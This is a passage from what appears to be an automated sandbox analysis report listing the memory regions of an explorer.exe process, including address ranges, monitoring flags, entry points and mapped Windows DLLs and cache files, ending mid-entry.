region_type = mapped_file name = "thumbcache_48.db" filename = "\\Users\\OqXZRaykm\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_48.db" (normalized: "c:\\users\\oqxzraykm\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_48.db") Region: id = 779 start_va = 0xc3e0000 end_va = 0xc4dffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_48.db" filename = "\\Users\\OqXZRaykm\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_48.db" (normalized: "c:\\users\\oqxzraykm\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_48.db") Region: id = 780 start_va = 0xc5e0000 end_va = 0xc6dffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_48.db" filename = "\\Users\\OqXZRaykm\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_48.db" (normalized: "c:\\users\\oqxzraykm\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_48.db") Region: id = 781 start_va = 0xc8e0000 end_va = 0xca8afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ieframe.dll.mui" filename = "\\Windows\\System32\\en-US\\ieframe.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\ieframe.dll.mui") Region: id = 782 start_va = 0xcaa0000 end_va = 0xcb1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000caa0000" filename = "" Region: id = 783 start_va = 0xcde0000 end_va = 0xcedffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_48.db" filename = "\\Users\\OqXZRaykm\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_48.db" (normalized: "c:\\users\\oqxzraykm\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_48.db") Region: id = 784 start_va = 0xcfb0000 end_va = 0xd0affff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_32.db" filename = "\\Users\\OqXZRaykm\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_32.db" (normalized: "c:\\users\\oqxzraykm\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_32.db") Region: id = 785 start_va = 0xd2b0000 end_va = 0xd32ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000d2b0000" filename = "" Region: id = 786 start_va = 0xd330000 end_va = 0xd42ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_48.db" filename = "\\Users\\OqXZRaykm\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_48.db" (normalized: "c:\\users\\oqxzraykm\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_48.db") Region: id = 787 start_va = 0xd530000 end_va = 0xd5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000d530000" filename = "" Region: id = 788 start_va = 0xd5b0000 end_va = 0xd6affff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_16.db" filename = "\\Users\\OqXZRaykm\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_16.db" (normalized: "c:\\users\\oqxzraykm\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_16.db") Region: id = 789 start_va = 0xd740000 end_va = 0xdf3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000d740000" filename = "" Region: id = 790 start_va = 0xe050000 end_va = 0xe0cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000e050000" filename = "" Region: id = 791 start_va = 0xe140000 end_va = 0xe1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000e140000" filename = "" Region: id = 792 start_va = 0xe2f0000 end_va = 0xe36ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000e2f0000" filename = "" Region: id = 793 start_va = 0xe470000 end_va = 0xe4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000e470000" filename = "" Region: id = 794 start_va = 0xe770000 end_va = 0xe7effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000e770000" filename = "" Region: id = 795 start_va = 0xe7f0000 end_va = 0xe86ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000e7f0000" filename = "" Region: id = 796 start_va = 0xecc0000 end_va = 0xed3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ecc0000" filename = "" Region: id = 797 start_va = 0xed40000 end_va = 0xf231fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ed40000" filename = "" Region: id = 798 start_va = 0xfbc0000 end_va = 0xfc3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fbc0000" filename = "" Region: id = 799 start_va = 0xfe40000 end_va = 0xfebffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fe40000" filename = "" Region: id = 800 start_va = 0xfec0000 end_va = 0x103b1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fec0000" filename = "" Region: id = 801 start_va = 0x108c0000 end_va = 0x10db1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000108c0000" filename = "" Region: id = 802 start_va = 0x7ffe0000 end_va = 0x7ffe0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 803 start_va = 0x7ff4fde80000 end_va = 0x7ff4fde8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff4fde80000" filename = "" Region: id = 804 start_va = 0x7ff4fde90000 end_va = 0x7ff4fdf8ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff4fde90000" filename = "" Region: id = 805 start_va = 0x7ff4fdf90000 end_va = 0x7ff5fdfaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff4fdf90000" filename = "" Region: id = 806 start_va = 0x7ff5fdfb0000 end_va = 0x7ff5fffb0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff5fdfb0000" filename = "" Region: id = 807 start_va = 0x7ff5fffc0000 end_va = 0x7ff5fffc0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5fffc0000" filename = "" Region: id = 808 start_va = 0x7ff5fffd0000 end_va = 0x7ff5ffff2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5fffd0000" filename = "" Region: id = 809 start_va = 0x7ff6a6b30000 end_va = 0x7ff6a6f72fff monitored = 0 entry_point = 0x7ff6a6bc6d20 region_type = mapped_file name = "explorer.exe" filename = "\\Windows\\explorer.exe" (normalized: "c:\\windows\\explorer.exe") Region: id = 810 start_va = 0x7fffa9120000 end_va = 0x7fffa919cfff monitored = 0 entry_point = 0x7fffa91226f0 region_type = mapped_file name = "provsvc.dll" filename = "\\Windows\\System32\\provsvc.dll" (normalized: "c:\\windows\\system32\\provsvc.dll") Region: id = 811 start_va = 0x7fffab070000 end_va = 0x7fffab7b9fff monitored = 0 entry_point = 0x7fffab18b240 region_type = mapped_file name = "ieframe.dll" filename = "\\Windows\\System32\\ieframe.dll" (normalized: "c:\\windows\\system32\\ieframe.dll") Region: id = 812 start_va = 0x7fffac300000 end_va = 0x7fffac4a5fff monitored = 0 entry_point = 0x7fffac356b40 region_type = mapped_file name = "gdiplus.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.19041.207_none_faee9ef77614c0c2\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.19041.207_none_faee9ef77614c0c2\\gdiplus.dll") Region: id = 813 start_va = 0x7fffac960000 end_va = 0x7fffac9b3fff monitored = 0 entry_point = 0x7fffac963650 region_type = mapped_file name = "msiso.dll" filename = "\\Windows\\System32\\msIso.dll" (normalized: "c:\\windows\\system32\\msiso.dll") Region: id = 814 start_va = 0x7fffadeb0000 end_va = 0x7fffadf01fff monitored = 0 entry_point = 0x7fffaded5540 region_type = mapped_file name = "smartscreenps.dll" filename = "\\Windows\\System32\\smartscreenps.dll" (normalized: "c:\\windows\\system32\\smartscreenps.dll") Region: id = 815 start_va = 0x7fffadff0000 end_va = 0x7fffae005fff monitored = 0 entry_point = 0x7fffadff3a20 region_type = mapped_file name = "pcacli.dll" filename = "\\Windows\\System32\\pcacli.dll" (normalized: "c:\\windows\\system32\\pcacli.dll") Region: id = 816 start_va = 0x7fffae070000 end_va = 0x7fffae27dfff monitored = 0 entry_point = 0x7fffae1e4360 region_type = mapped_file name = "taskflowui.dll" filename = "\\Windows\\ShellComponents\\TaskFlowUI.dll" (normalized: "c:\\windows\\shellcomponents\\taskflowui.dll") Region: id = 817 start_va = 0x7fffae510000 end_va = 0x7fffae551fff monitored = 0 entry_point = 0x7fffae516d40 region_type = mapped_file name = "mlang.dll" filename = "\\Windows\\System32\\mlang.dll" (normalized: "c:\\windows\\system32\\mlang.dll") Region: id = 818 start_va = 0x7fffae5b0000 end_va = 0x7fffae5fbfff monitored = 0 entry_point = 0x7fffae5b5fd0 region_type = mapped_file name = "wscapi.dll" filename = "\\Windows\\System32\\wscapi.dll" (normalized: "c:\\windows\\system32\\wscapi.dll") Region: id = 819 start_va = 0x7fffae600000 end_va = 0x7fffae660fff monitored = 0 entry_point = 0x7fffae641980 region_type = mapped_file name = "windows.fileexplorer.common.dll" filename = "\\Windows\\System32\\Windows.FileExplorer.Common.dll" (normalized: "c:\\windows\\system32\\windows.fileexplorer.common.dll") Region: id = 820 start_va = 0x7fffae670000 end_va = 0x7fffae6c2fff monitored = 0 entry_point = 0x7fffae678810 region_type = mapped_file name = "actioncenter.dll" filename = "\\Windows\\System32\\ActionCenter.dll" (normalized: "c:\\windows\\system32\\actioncenter.dll") Region: id = 821 start_va = 0x7fffae6d0000 end_va = 0x7fffae8e8fff monitored = 0 entry_point = 0x7fffae6ddaf0 region_type = mapped_file name = "pnidui.dll" filename = "\\Windows\\System32\\pnidui.dll" (normalized: "c:\\windows\\system32\\pnidui.dll") Region: id = 822 start_va = 0x7fffae8f0000 end_va = 0x7fffae8fcfff monitored = 0 entry_point = 0x7fffae8f4630 region_type = mapped_file name = "atlthunk.dll" filename = "\\Windows\\System32\\atlthunk.dll" (normalized: "c:\\windows\\system32\\atlthunk.dll") Region: id = 823 start_va = 0x7fffae900000 end_va = 0x7fffae918fff monitored = 0 entry_point = 0x7fffae902820 region_type = mapped_file name = "syncreg.dll" filename = "\\Windows\\System32\\Syncreg.dll" (normalized: "c:\\windows\\system32\\syncreg.dll") Region: id = 824 start_va = 0x7fffae920000 end_va = 0x7fffae960fff monitored = 0 entry_point = 0x7fffae921e00 region_type = mapped_file name = "shdocvw.dll" filename = "\\Windows\\System32\\shdocvw.dll" (normalized: "c:\\windows\\system32\\shdocvw.dll") Region: id = 825 start_va = 0x7fffae970000 end_va = 0x7fffae9e9fff monitored = 0 entry_point = 0x7fffae972550 region_type = mapped_file name = "dxp.dll" filename = "\\Windows\\System32\\DXP.dll" (normalized: "c:\\windows\\system32\\dxp.dll") Region: id = 826 start_va = 0x7fffaeb90000 end_va = 0x7fffaebcdfff monitored = 0 entry_point = 0x7fffaeb938e0 region_type = mapped_file name = "prnfldr.dll" filename = "\\Windows\\System32\\prnfldr.dll" (normalized: "c:\\windows\\system32\\prnfldr.dll") Region: id = 827 start_va = 0x7fffaebd0000 end_va = 0x7fffaebddfff monitored = 0 entry_point = 0x7fffaebd26d0 region_type = mapped_file name = "windows.ui.shell.dll" filename = "\\Windows\\System32\\Windows.UI.Shell.dll" (normalized: "c:\\windows\\system32\\windows.ui.shell.dll") Region: id = 828 start_va = 0x7fffaebe0000 end_va = 0x7fffaebeefff monitored = 0 entry_point = 0x7fffaebe1450 region_type = mapped_file name = "batmeter.dll" filename = "\\Windows\\System32\\batmeter.dll" (normalized: "c:\\windows\\system32\\batmeter.dll") Region: id = 829 start_va = 0x7fffaebf0000 end_va = 0x7fffaec40fff monitored = 0 entry_point = 0x7fffaebf7350 region_type = mapped_file name = "stobject.dll" filename = "\\Windows\\System32\\stobject.dll" (normalized: "c:\\windows\\system32\\stobject.dll") Region: id = 830 start_va = 0x7fffaed10000 end_va = 0x7fffaede9fff monitored = 0 entry_point = 0x7fffaed16450 region_type = mapped_file name = "ieproxy.dll" filename = "\\Windows\\System32\\ieproxy.dll" (normalized: "c:\\windows\\system32\\ieproxy.dll") Region: id = 831 start_va = 0x7fffaeec0000 end_va = 0x7fffaeeeffff monitored = 0 entry_point = 0x7fffaeecbe20 region_type = mapped_file name = "rtworkq.dll" filename = "\\Windows\\System32\\RTWorkQ.dll" (normalized: "c:\\windows\\system32\\rtworkq.dll") Region: id = 832 start_va = 0x7fffaeef0000 end_va = 0x7fffaf0aafff monitored = 0 entry_point = 0x7fffaef24590 region_type = mapped_file name = "mfplat.dll" filename = "\\Windows\\System32\\mfplat.dll" (normalized: "c:\\windows\\system32\\mfplat.dll") Region: id = 833 start_va = 0x7fffaf320000 end_va = 0x7fffaf54dfff monitored = 0 entry_point = 0x7fffaf3335e0 region_type = mapped_file name = "icu.dll" filename = "\\Windows\\System32\\icu.dll" (normalized: "c:\\windows\\system32\\icu.dll") Region: id = 834 start_va = 0x7fffb1820000 end_va = 0x7fffb1830fff monitored = 0 entry_point = 0x7fffb1826910 region_type = mapped_file name = "dusmapi.dll" filename = "\\Windows\\System32\\dusmapi.dll" (normalized: "c:\\windows\\system32\\dusmapi.dll") Region: id = 835 start_va = 0x7fffb1840000 end_va = 0x7fffb187efff monitored = 0 entry_point = 0x7fffb185e5f0 region_type = mapped_file name = "capabilityaccessmanagerclient.dll" filename = "\\Windows\\System32\\CapabilityAccessManagerClient.dll" (normalized: "c:\\windows\\system32\\capabilityaccessmanagerclient.dll") Region: id = 836 start_va = 0x7fffb2dd0000 end_va = 0x7fffb2e2dfff monitored = 0 entry_point = 0x7fffb2dd24d0 region_type = mapped_file name = "wpnclient.dll" filename = "\\Windows\\System32\\wpnclient.dll" (normalized: "c:\\windows\\system32\\wpnclient.dll") Region: id = 837 start_va = 0x7fffb3890000 end_va = 0x7fffb38e0fff monitored = 0 entry_point = 0x7fffb38c2fd0 region_type = mapped_file name = "capauthz.dll" filename = "\\Windows\\System32\\capauthz.dll" (normalized: "c:\\windows\\system32\\capauthz.dll") Region: id = 838 start_va = 0x7fffb3910000 end_va = 0x7fffb393efff monitored = 0 entry_point = 0x7fffb392ac30 region_type = mapped_file name = "cflapi.dll" filename = "\\Windows\\System32\\cflapi.dll" (normalized: "c:\\windows\\system32\\cflapi.dll") Region: id = 839 start_va = 0x7fffb3940000 end_va = 0x7fffb39affff monitored = 0 entry_point = 0x7fffb3953d40 region_type = mapped_file name = "cryptngc.dll" filename = "\\Windows\\System32\\cryptngc.dll" (normalized: "c:\\windows\\system32\\cryptngc.dll") Region: id = 840 start_va = 0x7fffb39b0000 end_va = 0x7fffb3a5efff monitored = 0 entry_point = 0x7fffb39b44f0 region_type = mapped_file name = "shellcommoncommonproxystub.dll" filename = "\\Windows\\System32\\ShellCommonCommonProxyStub.dll" (normalized: "c:\\windows\\system32\\shellcommoncommonproxystub.dll") Region: id = 841 start_va = 0x7fffb3a60000 end_va = 0x7fffb3a70fff monitored = 0 entry_point = 0x7fffb3a61af0 region_type = mapped_file name = "pcshellcommonproxystub.dll" filename = "\\Windows\\System32\\PCShellCommonProxyStub.dll" (normalized: "c:\\windows\\system32\\pcshellcommonproxystub.dll") Region: id = 842 start_va = 0x7fffb3a90000 end_va = 0x7fffb3b98fff monitored = 0 entry_point = 0x7fffb3ab7910 region_type = mapped_file name = "windows.ui.core.textinput.dll" filename = "\\Windows\\System32\\Windows.UI.Core.TextInput.dll" (normalized: "c:\\windows\\system32\\windows.ui.core.textinput.dll") Region: id = 843 start_va = 0x7fffb3ba0000 end_va = 0x7fffb3bf1fff monitored = 0 entry_point = 0x7fffb3bb3150 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll") Region: id = 844 start_va = 0x7fffb3eb0000 end_va = 0x7fffb3f2cfff monitored = 0 entry_point = 0x7fffb3ef5320 region_type = mapped_file name = "tilecontrol.dll" filename = "\\Windows\\ShellExperiences\\TileControl.dll" (normalized: "c:\\windows\\shellexperiences\\tilecontrol.dll") Region: id = 845 start_va = 0x7fffb3f30000 end_va = 0x7fffb417afff monitored = 0 entry_point = 0x7fffb40cbfa0 region_type = mapped_file name = "windowsinternal.composableshell.experiences.switcher.dll" filename = "\\Windows\\ShellComponents\\WindowsInternal.ComposableShell.Experiences.Switcher.dll" (normalized: "c:\\windows\\shellcomponents\\windowsinternal.composableshell.experiences.switcher.dll") Region: id = 846 start_va = 0x7fffb4400000 end_va = 0x7fffb4409fff monitored = 0 entry_point = 0x7fffb4401390 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 847 start_va = 0x7fffb4480000 end_va = 0x7fffb44fffff monitored = 0 entry_point = 0x7fffb44cb0c0 region_type = mapped_file name = "dictationmanager.dll" filename = "\\Windows\\System32\\DictationManager.dll" (normalized: "c:\\windows\\system32\\dictationmanager.dll") Region: id = 848 start_va = 0x7fffb4500000 end_va = 0x7fffb46d9fff monitored = 0 entry_point = 0x7fffb4521560 region_type = mapped_file name = "windowsudk.shellcommon.dll" filename = "\\Windows\\System32\\windowsudk.shellcommon.dll" (normalized: "c:\\windows\\system32\\windowsudk.shellcommon.dll") Region: id = 849 start_va = 0x7fffb4b10000 end_va = 0x7fffb4b8cfff monitored = 0 entry_point = 0x7fffb4b18340 region_type = mapped_file name = "synccenter.dll" filename = "\\Windows\\System32\\SyncCenter.dll" (normalized: "c:\\windows\\system32\\synccenter.dll") Region: id = 850 start_va = 0x7fffb4b90000 end_va = 0x7fffb4c16fff monitored = 0 entry_point = 0x7fffb4b91e10 region_type = mapped_file name = "windows.data.activities.dll" filename = "\\Windows\\System32\\Windows.Data.Activities.dll" (normalized: "c:\\windows\\system32\\windows.data.activities.dll") Region: id = 851 start_va = 0x7fffb4d60000 end_va = 0x7fffb4edbfff monitored = 0 entry_point = 0x7fffb4e46f30 region_type = mapped_file name = "taskflowdataengine.dll" filename = "\\Windows\\System32\\TaskFlowDataEngine.dll" (normalized: "c:\\windows\\system32\\taskflowdataengine.dll") Region: id = 852 start_va = 0x7fffb5030000 end_va = 0x7fffb528dfff monitored = 0 entry_point = 0x7fffb5098a80 region_type = mapped_file name = "msxml6.dll" filename = "\\Windows\\System32\\msxml6.dll" (normalized: "c:\\windows\\system32\\msxml6.dll") Region: id = 853 start_va = 0x7fffb54c0000 end_va = 0x7fffb55cffff monitored = 0 entry_point = 0x7fffb5573a20 region_type = mapped_file name = "windows.internal.signals.dll" filename = "\\Windows\\System32\\Windows.Internal.Signals.dll" (normalized: "c:\\windows\\system32\\windows.internal.signals.dll") Region: id = 854 start_va = 0x7fffb55d0000 end_va = 0x7fffb5623fff monitored = 0 entry_point = 0x7fffb5606a80 region_type = mapped_file name = "windows.shell.bluelightreduction.dll" filename = "\\Windows\\System32\\Windows.Shell.BlueLightReduction.dll" (normalized: "c:\\windows\\system32\\windows.shell.bluelightreduction.dll") Region: id = 855 start_va = 0x7fffb5630000 end_va = 0x7fffb5664fff monitored = 0 entry_point = 0x7fffb564f4a0 region_type = mapped_file name = "npsm.dll" filename = "\\Windows\\System32\\NPSM.dll" (normalized: "c:\\windows\\system32\\npsm.dll") Region: id = 856 start_va = 0x7fffb5740000 end_va = 0x7fffb57abfff monitored = 0 entry_point = 0x7fffb574d1e0 region_type = mapped_file name = "abovelockapphost.dll" filename = "\\Windows\\System32\\AboveLockAppHost.dll" (normalized: "c:\\windows\\system32\\abovelockapphost.dll") Region: id = 857 start_va = 0x7fffb57b0000 end_va = 0x7fffb57d6fff monitored = 0 entry_point = 0x7fffb57b4220 region_type = mapped_file name = "winmm.dll" filename = "\\Windows\\System32\\winmm.dll" (normalized: "c:\\windows\\system32\\winmm.dll") Region: id = 858 start_va = 0x7fffb57e0000 end_va = 0x7fffb57f7fff monitored = 0 entry_point = 0x7fffb57e1360 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 859 start_va = 0x7fffb59b0000 end_va = 0x7fffb59cbfff monitored = 0 entry_point = 0x7fffb59beb20 region_type = mapped_file name = "virtualmonitormanager.dll" filename = "\\Windows\\System32\\VirtualMonitorManager.dll" (normalized: "c:\\windows\\system32\\virtualmonitormanager.dll") Region: id = 860 start_va = 0x7fffb59d0000 end_va = 0x7fffb5aa2fff monitored = 0 entry_point = 0x7fffb5a51ad0 region_type = mapped_file name = "holographicextensions.dll" filename = "\\Windows\\System32\\HolographicExtensions.dll" (normalized: "c:\\windows\\system32\\holographicextensions.dll") Region: id = 861 start_va = 0x7fffb5d40000 end_va = 0x7fffb5d4bfff monitored = 0 entry_point = 0x7fffb5d42560 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 862 start_va = 0x7fffb6030000 end_va = 0x7fffb60fcfff monitored = 0 entry_point = 0x7fffb6035b60 region_type = mapped_file name = "cscui.dll" filename = "\\Windows\\System32\\cscui.dll" (normalized: "c:\\windows\\system32\\cscui.dll") Region: id = 863 start_va = 0x7fffb6100000 end_va = 0x7fffb6136fff monitored = 0 entry_point = 0x7fffb6102e30 region_type = mapped_file name = "ehstorshell.dll" filename = "\\Windows\\System32\\EhStorShell.dll" (normalized: "c:\\windows\\system32\\ehstorshell.dll") Region: id = 864 start_va = 0x7fffb6240000 end_va = 0x7fffb624cfff monitored = 0 entry_point = 0x7fffb6241df0 region_type = mapped_file name = "linkinfo.dll" filename = "\\Windows\\System32\\linkinfo.dll" (normalized: "c:\\windows\\system32\\linkinfo.dll") Region: id = 865 start_va = 0x7fffb6250000 end_va = 0x7fffb62ccfff monitored = 0 entry_point = 0x7fffb62617b0 region_type = mapped_file name = "ntshrui.dll" filename = "\\Windows\\System32\\ntshrui.dll" (normalized: "c:\\windows\\system32\\ntshrui.dll") Region: id = 866 start_va = 0x7fffb62d0000 end_va = 0x7fffb637afff monitored = 0 entry_point = 0x7fffb6300af0 region_type = mapped_file name = "applicationframe.dll" filename = "\\Windows\\System32\\ApplicationFrame.dll" (normalized: "c:\\windows\\system32\\applicationframe.dll") Region: id = 867 start_va = 0x7fffb6380000 end_va = 0x7fffb63c8fff monitored = 0 entry_point = 0x7fffb6383550 region_type = mapped_file name = "pdh.dll" filename = "\\Windows\\System32\\pdh.dll" (normalized: "c:\\windows\\system32\\pdh.dll") Region: id = 868 start_va = 0x7fffb63d0000 end_va = 0x7fffb69bdfff monitored = 0 entry_point = 0x7fffb6484e60 region_type = mapped_file name = "twinui.dll" filename = "\\Windows\\System32\\twinui.dll" (normalized: "c:\\windows\\system32\\twinui.dll") Region: id = 869 start_va = 0x7fffb6ac0000 end_va = 0x7fffb6ae3fff monitored = 0 entry_point = 0x7fffb6ac1790 region_type = mapped_file name = "edputil.dll" filename = "\\Windows\\System32\\edputil.dll" (normalized: "c:\\windows\\system32\\edputil.dll") Region: id = 870 start_va = 0x7fffb6af0000 end_va = 0x7fffb6b55fff monitored = 0 entry_point = 0x7fffb6b0d000 region_type = mapped_file name = "thumbcache.dll" filename = "\\Windows\\System32\\thumbcache.dll" (normalized: "c:\\windows\\system32\\thumbcache.dll") Region: id = 871 start_va = 0x7fffb6c20000 end_va = 0x7fffb6c41fff monitored = 0 entry_point = 0x7fffb6c35070 region_type = mapped_file name = "cldapi.dll" filename = "\\Windows\\System32\\cldapi.dll" (normalized: "c:\\windows\\system32\\cldapi.dll") Region: id = 872 start_va = 0x7fffb6c50000 end_va = 0x7fffb6d0dfff monitored = 0 entry_point = 0x7fffb6c63a80 region_type = mapped_file name = "windows.immersiveshell.serviceprovider.dll" filename = "\\Windows\\System32\\windows.immersiveshell.serviceprovider.dll" (normalized: "c:\\windows\\system32\\windows.immersiveshell.serviceprovider.dll") Region: id = 873 start_va = 0x7fffb6d10000 end_va = 0x7fffb72dcfff monitored = 0 entry_point = 0x7fffb6d99030 region_type = mapped_file name = "twinui.pcshell.dll" filename = "\\Windows\\System32\\twinui.pcshell.dll" (normalized: "c:\\windows\\system32\\twinui.pcshell.dll") Region: id = 874 start_va = 0x7fffb72e0000 end_va = 0x7fffb74fefff monitored = 0 entry_point = 0x7fffb7366f20 region_type = mapped_file name = "explorerframe.dll" filename = "\\Windows\\System32\\ExplorerFrame.dll" (normalized: "c:\\windows\\system32\\explorerframe.dll") Region: id = 875 start_va = 0x7fffb7500000 end_va = 0x7fffb753dfff monitored = 0 entry_point = 0x7fffb7507f40 region_type = mapped_file name = "dataexchange.dll" filename = "\\Windows\\System32\\DataExchange.dll" (normalized: "c:\\windows\\system32\\dataexchange.dll") Region: id = 876 start_va = 0x7fffb7540000 end_va = 0x7fffb75a5fff monitored = 0 entry_point = 0x7fffb754eb60 region_type = mapped_file name = "oleacc.dll" filename = "\\Windows\\System32\\oleacc.dll" (normalized: "c:\\windows\\system32\\oleacc.dll") Region: id = 877 start_va = 0x7fffb75b0000 end_va = 0x7fffb75fffff monitored = 0 entry_point = 0x7fffb75ba9a0 region_type = mapped_file name = "sndvolsso.dll" filename = "\\Windows\\System32\\SndVolSSO.dll" (normalized: "c:\\windows\\system32\\sndvolsso.dll") Region: id = 878 start_va = 0x7fffb7600000 end_va = 0x7fffb7b82fff monitored = 0 entry_point = 0x7fffb7724880 region_type = mapped_file name = "starttiledata.dll" filename = "\\Windows\\System32\\StartTileData.dll" (normalized: "c:\\windows\\system32\\starttiledata.dll") Region: id = 879 start_va = 0x7fffb7b90000 end_va = 0x7fffb7e29fff monitored = 0 entry_point = 0x7fffb7c296c0 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.19041.1_none_b555e41d4684ddec\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.19041.1_none_b555e41d4684ddec\\comctl32.dll") Region: id = 880 start_va = 0x7fffb7e30000 end_va = 0x7fffb7ed8fff monitored = 0 entry_point = 0x7fffb7e3e040 region_type = mapped_file name = "twinapi.dll" filename = "\\Windows\\System32\\twinapi.dll" (normalized: "c:\\windows\\system32\\twinapi.dll") Region: id = 881 start_va = 0x7fffb7ee0000 end_va = 0x7fffb7f6afff monitored = 0 entry_point = 0x7fffb7ef7060 region_type = mapped_file name = "aepic.dll" filename = "\\Windows\\System32\\aepic.dll" (normalized: "c:\\windows\\system32\\aepic.dll") Region: id = 882 start_va = 0x7fffb7f70000 end_va = 0x7fffb7fcdfff monitored = 0 entry_point = 0x7fffb7f72ba0 region_type = mapped_file name = "notificationcontrollerps.dll" filename = "\\Windows\\System32\\NotificationControllerPS.dll" (normalized: "c:\\windows\\system32\\notificationcontrollerps.dll") Region: id = 883 start_va = 0x7fffb7fd0000 end_va = 0x7fffb8113fff monitored = 0 entry_point = 0x7fffb7febfd0 region_type = mapped_file name = "wpnapps.dll" filename = "\\Windows\\System32\\wpnapps.dll" (normalized: "c:\\windows\\system32\\wpnapps.dll") Region: id = 884 start_va = 0x7fffb8120000 end_va = 0x7fffb815ffff monitored = 0 entry_point = 0x7fffb8125af0 region_type = mapped_file name = "windows.staterepositoryclient.dll" filename = "\\Windows\\System32\\Windows.StateRepositoryClient.dll" (normalized: "c:\\windows\\system32\\windows.staterepositoryclient.dll") Region: id = 885 start_va = 0x7fffb8160000 end_va = 0x7fffb81f8fff monitored = 0 entry_point = 0x7fffb816e1c0 region_type = mapped_file name = "tiledatarepository.dll" filename = "\\Windows\\System32\\TileDataRepository.dll" (normalized: "c:\\windows\\system32\\tiledatarepository.dll") Region: id = 886 start_va = 0x7fffb8a20000 end_va = 0x7fffb8a66fff monitored = 0 entry_point = 0x7fffb8a4dc00 region_type = mapped_file name = "container.dll" filename = "\\Windows\\System32\\container.dll" (normalized: "c:\\windows\\system32\\container.dll") Region: id = 887 start_va = 0x7fffb8a70000 end_va = 0x7fffb8a7afff monitored = 0 entry_point = 0x7fffb8a73070 region_type = mapped_file name = "fltlib.dll" filename = "\\Windows\\System32\\fltLib.dll" (normalized: "c:\\windows\\system32\\fltlib.dll") Region: id = 888 start_va = 0x7fffb8a80000 end_va = 0x7fffb8b2dfff monitored = 0 entry_point = 0x7fffb8aef9d0 region_type = mapped_file name = "daxexec.dll" filename = "\\Windows\\System32\\daxexec.dll" (normalized: "c:\\windows\\system32\\daxexec.dll") Region: id = 889 start_va = 0x7fffb8bb0000 end_va = 0x7fffb8bc7fff monitored = 0 entry_point = 0x7fffb8bb1bf0 region_type = mapped_file name = "execmodelproxy.dll" filename = "\\Windows\\System32\\execmodelproxy.dll" (normalized: "c:\\windows\\system32\\execmodelproxy.dll") Region: id = 890 start_va = 0x7fffb8bd0000 end_va = 0x7fffb8c69fff monitored = 0 entry_point = 0x7fffb8bd60e0 region_type = mapped_file name = "uiamanager.dll" filename = "\\Windows\\System32\\UiaManager.dll" (normalized: "c:\\windows\\system32\\uiamanager.dll") Region: id = 891 start_va = 0x7fffb8c70000 end_va = 0x7fffb8d14fff monitored = 0 entry_point = 0x7fffb8c767f0 region_type = mapped_file name = "twinui.appcore.dll" filename = "\\Windows\\System32\\twinui.appcore.dll" (normalized: "c:\\windows\\system32\\twinui.appcore.dll") Region: id = 892 start_va = 0x7fffb8d40000 end_va = 0x7fffb8dfbfff monitored = 0 entry_point = 0x7fffb8dbd430 region_type = mapped_file name = "windows.system.launcher.dll" filename = "\\Windows\\System32\\Windows.System.Launcher.dll" (normalized: 